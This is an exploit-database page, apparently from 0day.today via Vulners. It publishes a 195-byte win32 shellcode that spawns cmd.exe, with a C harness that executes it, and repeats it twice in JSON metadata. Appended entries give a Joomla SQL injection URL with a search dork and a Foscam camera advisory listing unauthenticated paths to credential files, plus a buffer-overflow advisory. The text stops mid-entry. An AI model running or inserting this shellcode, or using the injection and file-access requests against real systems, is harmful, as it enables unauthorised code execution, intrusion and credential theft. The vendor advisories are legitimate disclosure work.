Search...

win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes

2010-06-25T00:00:00

ID 1337DAY-ID-12941
Type zdt
Reporter RubberDuck
Modified 2010-06-25T00:00:00

Description

Exploit for win32 platform in category shellcode

                                        
                                            =========================================================
win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
=========================================================


/*
Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
Date: 2010-06-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule and others
*/
 
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
 
int main(){
    unsigned char shellcode[]=
    "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
    "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
    "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
    "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
    "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
    "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
    "\x24\x20\x57\xFF\xD0";
 
    printf("Size = %d\n", strlen(shellcode));
 
    system("PAUSE");
 
    ((void (*)())shellcode)();
 
    return 0;
}



#  0day.today [2018-01-02]  #

JSON Vulners Source

Initial Source

{"published": "2010-06-25T00:00:00", "id": "1337DAY-ID-12941", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:14:06", "bulletin": {"published": "2010-06-25T00:00:00", "id": "1337DAY-ID-12941", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:14:06"}}, "hash": "b3651c541924b6f5078ea6228bdcf648834f475de2d133fe78fd4cddd1899ef8", "description": "Exploit for win32 platform in category shellcode", "type": "zdt", "lastseen": "2016-04-20T02:14:06", "edition": 1, "title": "win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes", "href": "http://0day.today/exploit/description/12941", "modified": "2010-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/12941", "references": [], "reporter": "RubberDuck", "sourceData": "=========================================================\r\nwin32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\n=========================================================\r\n\r\n\r\n/*\r\nTitle: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\nDate: 2010-06-25\r\nAuthor: RubberDuck\r\nWeb: http://bflow.security-portal.cz\r\nTested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)\r\nThanks to: kernelhunter, Lodus, Vrtule and others\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\nint main(){\r\n unsigned char shellcode[]=\r\n \"\\xFC\\x33\\xD2\\xB2\\x30\\x64\\xFF\\x32\\x5A\\x8B\"\r\n \"\\x52\\x0C\\x8B\\x52\\x14\\x8B\\x72\\x28\\x33\\xC9\"\r\n \"\\xB1\\x18\\x33\\xFF\\x33\\xC0\\xAC\\x3C\\x61\\x7C\"\r\n \"\\x02\\x2C\\x20\\xC1\\xCF\\x0D\\x03\\xF8\\xE2\\xF0\"\r\n \"\\x81\\xFF\\x5B\\xBC\\x4A\\x6A\\x8B\\x5A\\x10\\x8B\"\r\n \"\\x12\\x75\\xDA\\x8B\\x53\\x3C\\x03\\xD3\\xFF\\x72\"\r\n \"\\x34\\x8B\\x52\\x78\\x03\\xD3\\x8B\\x72\\x20\\x03\"\r\n \"\\xF3\\x33\\xC9\\x41\\xAD\\x03\\xC3\\x81\\x38\\x47\"\r\n \"\\x65\\x74\\x50\\x75\\xF4\\x81\\x78\\x04\\x72\\x6F\"\r\n \"\\x63\\x41\\x75\\xEB\\x81\\x78\\x08\\x64\\x64\\x72\"\r\n \"\\x65\\x75\\xE2\\x49\\x8B\\x72\\x24\\x03\\xF3\\x66\"\r\n \"\\x8B\\x0C\\x4E\\x8B\\x72\\x1C\\x03\\xF3\\x8B\\x14\"\r\n \"\\x8E\\x03\\xD3\\x52\\x68\\x78\\x65\\x63\\x01\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x57\\x69\\x6E\\x45\\x54\\x53\"\r\n \"\\xFF\\xD2\\x68\\x63\\x6D\\x64\\x01\\xFE\\x4C\\x24\"\r\n \"\\x03\\x6A\\x05\\x33\\xC9\\x8D\\x4C\\x24\\x04\\x51\"\r\n \"\\xFF\\xD0\\x68\\x65\\x73\\x73\\x01\\x8B\\xDF\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x50\\x72\\x6F\\x63\\x68\\x45\"\r\n \"\\x78\\x69\\x74\\x54\\xFF\\x74\\x24\\x20\\xFF\\x54\"\r\n \"\\x24\\x20\\x57\\xFF\\xD0\";\r\n \r\n printf(\"Size = %d\\n\", strlen(shellcode));\r\n \r\n system(\"PAUSE\");\r\n \r\n ((void (*)())shellcode)();\r\n \r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "21cbaab14a471b75fed0f3376fc6c601", "key": "reporter"}, {"hash": "059379f5bd3536268e22ac6c72f403ae", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "99a37fedde2cb1d7914067eadece0338", "key": "description"}, {"hash": "2789576efabdaffaf9ed9daf1c1471a8", "key": "sourceData"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5a4c063d45e3eded25425ad6261389c3", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7c6eafad7dd7e7ad776b284eb9fb9df3", "key": "sourceHref"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for win32 platform in category shellcode", "hash": "44af90efccb3f26e2a64f767bc8dda42b0b7cfee0a095c5aaa302e5668feb3b0", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-21026"]}, {"type": "exploitdb", "idList": ["EDB-ID:27076"]}], "modified": "2018-01-02T23:01:59"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-01-02T23:01:59", "edition": 2, "title": "win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes", "href": "https://0day.today/exploit/description/12941", "modified": "2010-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/12941", "references": [], "reporter": "RubberDuck", "sourceData": "=========================================================\r\nwin32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\n=========================================================\r\n\r\n\r\n/*\r\nTitle: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\nDate: 2010-06-25\r\nAuthor: RubberDuck\r\nWeb: http://bflow.security-portal.cz\r\nTested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)\r\nThanks to: kernelhunter, Lodus, Vrtule and others\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\nint main(){\r\n unsigned char shellcode[]=\r\n \"\\xFC\\x33\\xD2\\xB2\\x30\\x64\\xFF\\x32\\x5A\\x8B\"\r\n \"\\x52\\x0C\\x8B\\x52\\x14\\x8B\\x72\\x28\\x33\\xC9\"\r\n \"\\xB1\\x18\\x33\\xFF\\x33\\xC0\\xAC\\x3C\\x61\\x7C\"\r\n \"\\x02\\x2C\\x20\\xC1\\xCF\\x0D\\x03\\xF8\\xE2\\xF0\"\r\n \"\\x81\\xFF\\x5B\\xBC\\x4A\\x6A\\x8B\\x5A\\x10\\x8B\"\r\n \"\\x12\\x75\\xDA\\x8B\\x53\\x3C\\x03\\xD3\\xFF\\x72\"\r\n \"\\x34\\x8B\\x52\\x78\\x03\\xD3\\x8B\\x72\\x20\\x03\"\r\n \"\\xF3\\x33\\xC9\\x41\\xAD\\x03\\xC3\\x81\\x38\\x47\"\r\n \"\\x65\\x74\\x50\\x75\\xF4\\x81\\x78\\x04\\x72\\x6F\"\r\n \"\\x63\\x41\\x75\\xEB\\x81\\x78\\x08\\x64\\x64\\x72\"\r\n \"\\x65\\x75\\xE2\\x49\\x8B\\x72\\x24\\x03\\xF3\\x66\"\r\n \"\\x8B\\x0C\\x4E\\x8B\\x72\\x1C\\x03\\xF3\\x8B\\x14\"\r\n \"\\x8E\\x03\\xD3\\x52\\x68\\x78\\x65\\x63\\x01\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x57\\x69\\x6E\\x45\\x54\\x53\"\r\n \"\\xFF\\xD2\\x68\\x63\\x6D\\x64\\x01\\xFE\\x4C\\x24\"\r\n \"\\x03\\x6A\\x05\\x33\\xC9\\x8D\\x4C\\x24\\x04\\x51\"\r\n \"\\xFF\\xD0\\x68\\x65\\x73\\x73\\x01\\x8B\\xDF\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x50\\x72\\x6F\\x63\\x68\\x45\"\r\n \"\\x78\\x69\\x74\\x54\\xFF\\x74\\x24\\x20\\xFF\\x54\"\r\n \"\\x24\\x20\\x57\\xFF\\xD0\";\r\n \r\n printf(\"Size = %d\\n\", strlen(shellcode));\r\n \r\n system(\"PAUSE\");\r\n \r\n ((void (*)())shellcode)();\r\n \r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2018-01-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "99a37fedde2cb1d7914067eadece0338", "key": "description"}, {"hash": "069e2c9d0aa376fb8497858c8f2f6289", "key": "href"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "modified"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "21cbaab14a471b75fed0f3376fc6c601", "key": "reporter"}, {"hash": "b3d77d5d38c36511954eceb34105732f", "key": "sourceData"}, {"hash": "35e8c158d698693a632a8413db486fc8", "key": "sourceHref"}, {"hash": "059379f5bd3536268e22ac6c72f403ae", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"zdt": [{"lastseen": "2018-03-01T21:39:17", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-02-21T00:00:00", "published": "2017-02-21T00:00:00", "href": "https://0day.today/exploit/description/27076", "id": "1337DAY-ID-27076", "title": "Joomla J-HotelPortal 6.0.2 Component - review_id Parameter SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # # # \r\n# Exploit Title: Joomla! Component J-HotelPortal v6.0.2 - SQL Injection\r\n# Google Dork: inurl:index.php?option=com_jhotelreservation\r\n# Date: 21.02.2017\r\n# Vendor Homepage: http://www.cmsjunkie.com/\r\n# Software Buy: http://www.cmsjunkie.com/joomla-hotel-portal\r\n# Demo: http://hoteldemo.cmsjunkie.com/j3/portal/\r\n# Version: 6.0.2\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail : ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]\r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27076"}, {"lastseen": "2018-01-09T23:07:54", "bulletinFamily": "exploit", "description": "Due to improper access restrictions, the FOSCAM FI8620 device allows a remote attacker the ability to browse and access arbitrary files from the directories '/tmpfs/' and '/log/' without requiring authentication. This could allow disclosure of access credentials and more.", "modified": "2013-07-24T00:00:00", "published": "2013-07-24T00:00:00", "id": "1337DAY-ID-21026", "href": "https://0day.today/exploit/description/21026", "type": "zdt", "title": "FOSCAM IP-Cameras Improper Access Restrictions", "sourceData": "FOSCAM IP-Cameras Improper Access Restrictions\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: FOSCAM IP-Cameras Improper Access Restrictions\r\nAdvisory ID: CORE-2013-0613\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions\r\nDate published: 2013-07-23\r\nDate of last update: 2013-07-23\r\nVendors contacted: Foscam\r\nRelease mode: User release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Information Exposure [CWE-200]\r\nImpact: Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-2574\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nDue to improper access restriction the FOSCAM FI8620 device [1] allows a\r\nremote attacker to browse and access arbitrary files from the following\r\ndirectories '/tmpfs/' and '/log/' without requiring authentication. This\r\ncould allow a remote attacker to obtain valuable information such as\r\naccess credentials, Wi-Fi configuration and other sensitive information\r\nin plain text.\r\n\r\nThe list of affected files includes, but is not limited to, the following:\r\n\r\n . 'http://<target_ip>/tmpfs/config_backup.bin'\r\n . 'http://<target_ip>/tmpfs/config_restore.bin'\r\n . 'http://<target_ip>/tmpfs/ddns.conf'\r\n . 'http://<target_ip>/tmpfs/syslog.txt'\r\n . 'http://<target_ip>/log/syslog.txt'\r\n\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . FOSCAM FI8620 PTZ Camera.\r\n . Other Foscam devices based on the same firmware are probably\r\naffected too, but they were not checked.\r\n\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\nVendor did not provide details. Contact Foscam for further information.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThere was no official answer from Foscam after several attempts (see\r\n[Sec. 9]); contact vendor for further information. Some mitigation\r\nactions may be do not expose the camera to internet unless absolutely\r\nnecessary and have at least one proxy filtering HTTP requests to the\r\nfollowing resources:\r\n\r\n . '/tmpfs/config_backup.bin'\r\n . '/tmpfs/config_restore.bin'\r\n . '/tmpfs/ddns.conf'\r\n . '/tmpfs/syslog.txt'\r\n . '/log/syslog.txt'\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered by Flavio de Cristofaro and researched\r\nwith the help of Andres Blanco from Core Security Technologies. The\r\npublication of this advisory was coordinated by Fernando Miranda from\r\nCore Advisories Team.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n8.1. *Accessing Manufacturer DDNS configuration*\r\n\r\nBy requesting the following URL using your default web browser:\r\n\r\n\r\n/-----\r\nhttp://<target_ip>/tmpfs/ddns.conf\r\n-----/\r\n\r\nyou will see something like this:\r\n\r\n\r\n/-----\r\n[LoginInfo]\r\nHostName=ddns.myfoscam.org\r\nHostIP=113.105.65.47\r\nPort=8080\r\nUserName=<target username>\r\nPassword=<target plain password>\r\n[Domain]\r\nDomain=<target username>.myfoscam.org;\r\n-----/\r\n\r\n\r\n8.2. *Access Credentials Stored in Backup Files*\r\n\r\nWhen a configuration backup is required by an operator/administrator,\r\nthe backup is generated in the local folder 'tmpfs' named as\r\n'config_backup.bin'. The binary file is just a dump of the whole\r\nconfiguration packed as Gzip and can be accessed by accessing the\r\nfollowing URL:\r\n\r\n/-----\r\nhttp://<target_ip>/tmpfs/config_backup.bin\r\n-----/\r\n\r\nThe presence of this temporary file enables an unauthenticated attacker\r\nto download the configuration files which contain usernames, plaintext\r\npasswords (including admin passwords), Wifi configuration including\r\nplain PSK, among other interesting stuff as shown below:\r\n\r\n/-----\r\nusername = \"admin \"\r\npassword = \"admin \"\r\nauthtype = \"15 \" \r\nauthgroup = \" \"\r\n[user1]\r\nusername = \"user \"\r\npassword = \"user \"\r\nauthtype = \"3 \" \r\nauthgroup = \" \"\r\n[user2]\r\nusername = \"guest \"\r\npassword = \"guest \"\r\nauthtype = \"1 \" \r\nauthgroup = \" \"\r\n-----/\r\n\r\nIt is important to mention that, in order to access the configuration\r\nfile previously mentioned, an operator and/or administrator should have\r\nexecuted the backup process in advance.\r\n\r\n\r\n9. *Report Timeline*\r\n. 2013-06-12:\r\nCore Security Technologies notifies the Foscam team of the vulnerability.\r\n\r\n. 2013-06-12:\r\nVendor acknowledges the receipt of the email and asks for technical\r\ndetails.\r\n\r\n. 2013-06-13:\r\nA draft report with technical details and a PoC is sent to vendor.\r\nPublication date is set for Jul 3rd, 2013.\r\n\r\n. 2013-06-17:\r\nCore asks if the vulnerabilities are confirmed.\r\n\r\n. 2013-06-17:\r\nFoscam product team notifies that they have checked CORE's website [2],\r\nbut there is no Foscam info.\r\n\r\n. 2013-06-18:\r\nCore notifies that the advisory has not been published yet and re-sends\r\ntechnical details and proof of concept.\r\n\r\n. 2013-06-26:\r\nCORE asks for a reply.\r\n\r\n. 2013-07-03:\r\nFirst release date missed.\r\n\r\n. 2013-07-03:\r\nCore asks for a reply.\r\n\r\n. 2013-07-11:\r\nCore notifies that the issues were reported 1 month ago and there was no\r\nreply since [2013-06-18].\r\n\r\n. 2013-07-23:\r\nCore releases the advisory CORE-2013-0613 tagged as user-release.\r\n\r\n\r\n10. *References*\r\n\r\n[1] Foscam FI8620 - http://www.foscam.com/prd_view.aspx?id=176.\r\n[2] CORE Security Advisories http://www.coresecurity.com/grid/advisories.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21026"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "Directory traversal, CSRF.", "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:VULN:12941", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12941", "title": "Foscam cameras security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nCore Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nFOSCAM IP-Cameras Improper Access Restrictions\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: FOSCAM IP-Cameras Improper Access Restrictions\r\nAdvisory ID: CORE-2013-0613\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions\r\nDate published: 2013-07-23\r\nDate of last update: 2013-07-23\r\nVendors contacted: Foscam\r\nRelease mode: User release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Information Exposure [CWE-200]\r\nImpact: Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-2574\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nDue to improper access restriction the FOSCAM FI8620 device [1] allows a\r\nremote attacker to browse and access arbitrary files from the following\r\ndirectories '/tmpfs/' and '/log/' without requiring authentication. This\r\ncould allow a remote attacker to obtain valuable information such as\r\naccess credentials, Wi-Fi configuration and other sensitive information\r\nin plain text.\r\n\r\nThe list of affected files includes, but is not limited to, the following:\r\n\r\n . 'http://<target_ip>/tmpfs/config_backup.bin'\r\n . 'http://<target_ip>/tmpfs/config_restore.bin'\r\n . 'http://<target_ip>/tmpfs/ddns.conf'\r\n . 'http://<target_ip>/tmpfs/syslog.txt'\r\n . 'http://<target_ip>/log/syslog.txt'\r\n\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . FOSCAM FI8620 PTZ Camera.\r\n . Other Foscam devices based on the same firmware are probably\r\naffected too, but they were not checked.\r\n\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\nVendor did not provide details. Contact Foscam for further information.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThere was no official answer from Foscam after several attempts (see\r\n[Sec. 9]); contact vendor for further information. Some mitigation\r\nactions may be do not expose the camera to internet unless absolutely\r\nnecessary and have at least one proxy filtering HTTP requests to the\r\nfollowing resources:\r\n\r\n . '/tmpfs/config_backup.bin'\r\n . '/tmpfs/config_restore.bin'\r\n . '/tmpfs/ddns.conf'\r\n . '/tmpfs/syslog.txt'\r\n . '/log/syslog.txt'\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered by Flavio de Cristofaro and researched\r\nwith the help of Andres Blanco from Core Security Technologies. The\r\npublication of this advisory was coordinated by Fernando Miranda from\r\nCore Advisories Team.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n8.1. *Accessing Manufacturer DDNS configuration*\r\n\r\nBy requesting the following URL using your default web browser:\r\n\r\n\r\n/-----\r\nhttp://<target_ip>/tmpfs/ddns.conf\r\n-----/\r\n\r\nyou will see something like this:\r\n\r\n\r\n/-----\r\n[LoginInfo]\r\nHostName=ddns.myfoscam.org\r\nHostIP=113.105.65.47\r\nPort=8080\r\nUserName=<target username>\r\nPassword=<target plain password>\r\n[Domain]\r\nDomain=<target username>.myfoscam.org;\r\n-----/\r\n\r\n\r\n8.2. *Access Credentials Stored in Backup Files*\r\n\r\nWhen a configuration backup is required by an operator/administrator,\r\nthe backup is generated in the local folder 'tmpfs' named as\r\n'config_backup.bin'. The binary file is just a dump of the whole\r\nconfiguration packed as Gzip and can be accessed by accessing the\r\nfollowing URL:\r\n\r\n/-----\r\nhttp://<target_ip>/tmpfs/config_backup.bin\r\n-----/\r\n\r\nThe presence of this temporary file enables an unauthenticated attacker\r\nto download the configuration files which contain usernames, plaintext\r\npasswords (including admin passwords), Wifi configuration including\r\nplain PSK, among other interesting stuff as shown below:\r\n\r\n/-----\r\nusername = "admin "\r\npassword = "admin "\r\nauthtype = "15 " \r\nauthgroup = " "\r\n[user1]\r\nusername = "user "\r\npassword = "user "\r\nauthtype = "3 " \r\nauthgroup = " "\r\n[user2]\r\nusername = "guest "\r\npassword = "guest "\r\nauthtype = "1 " \r\nauthgroup = " "\r\n-----/\r\n\r\nIt is important to mention that, in order to access the configuration\r\nfile previously mentioned, an operator and/or administrator should have\r\nexecuted the backup process in advance.\r\n\r\n\r\n9. *Report Timeline*\r\n. 2013-06-12:\r\nCore Security Technologies notifies the Foscam team of the vulnerability.\r\n\r\n. 2013-06-12:\r\nVendor acknowledges the receipt of the email and asks for technical\r\ndetails.\r\n\r\n. 2013-06-13:\r\nA draft report with technical details and a PoC is sent to vendor.\r\nPublication date is set for Jul 3rd, 2013.\r\n\r\n. 2013-06-17:\r\nCore asks if the vulnerabilities are confirmed.\r\n\r\n. 2013-06-17:\r\nFoscam product team notifies that they have checked CORE's website [2],\r\nbut there is no Foscam info.\r\n\r\n. 2013-06-18:\r\nCore notifies that the advisory has not been published yet and re-sends\r\ntechnical details and proof of concept.\r\n\r\n. 2013-06-26:\r\nCORE asks for a reply.\r\n\r\n. 2013-07-03:\r\nFirst release date missed.\r\n\r\n. 2013-07-03:\r\nCore asks for a reply.\r\n\r\n. 2013-07-11:\r\nCore notifies that the issues were reported 1 month ago and there was no\r\nreply since [2013-06-18].\r\n\r\n. 2013-07-23:\r\nCore releases the advisory CORE-2013-0613 tagged as user-release.\r\n\r\n\r\n10. *References*\r\n\r\n[1] Foscam FI8620 - http://www.foscam.com/prd_view.aspx?id=176.\r\n[2] CORE Security Advisories http://www.coresecurity.com/grid/advisories.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\r\n", "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:DOC:29662", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29662", "title": "CORE-2013-0613 - FOSCAM IP-Cameras Improper Access Restrictions", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "description": "TITLE:\r\nNeoTrace Express/Pro ActiveX Control "TraceTarget()" Buffer Overflow\r\n\r\nSECUNIA ADVISORY ID:\r\nSA23463\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/23463/\r\n\r\nCRITICAL:\r\nHighly critical\r\n\r\nIMPACT:\r\nSystem access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nNeoTrace Pro 3.x\r\nhttp://secunia.com/product/7223/\r\nNeoTrace Express 3.x\r\nhttp://secunia.com/product/12941/\r\n\r\nDESCRIPTION:\r\nParvez Anwar has discovered a vulnerability in NeoTrace Pro and\r\nNeoTrace Express, which can be exploited by malicious people to\r\ncompromise a user's system.\r\n\r\nThe vulnerability is caused due to a boundary error in the\r\nNeoTraceExplorer.NeoTraceLoader ActiveX control\r\n(NeoTraceExplorer.dll) when constructing the command line used for\r\ninvoking the NeoTrace application. This can be exploited to cause a\r\nstack-based buffer overflow by passing an overly long string (about\r\n500 bytes) as argument to the "TraceTarget()" method.\r\n\r\nSuccessful exploitation allows execution of arbitrary code.\r\n\r\nThe vulnerability is confirmed in NeoTrace Express 3.25 and NeoTrace\r\nPro/McAfee Visual Trace 3.25. Other versions may also be affected.\r\n\r\nSOLUTION:\r\nRemove the affected ActiveX control (this may impact the\r\nfunctionality, but should only prevent the application from being\r\ninvoked via Internet Explorer).\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nParvez Anwar\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n\r\n", "modified": "2006-12-25T00:00:00", "published": "2006-12-25T00:00:00", "id": "SECURITYVULNS:DOC:15499", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15499", "title": "[SA23463] NeoTrace Express/Pro ActiveX Control "TraceTarget()" Buffer Overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "xmcdconfig creates 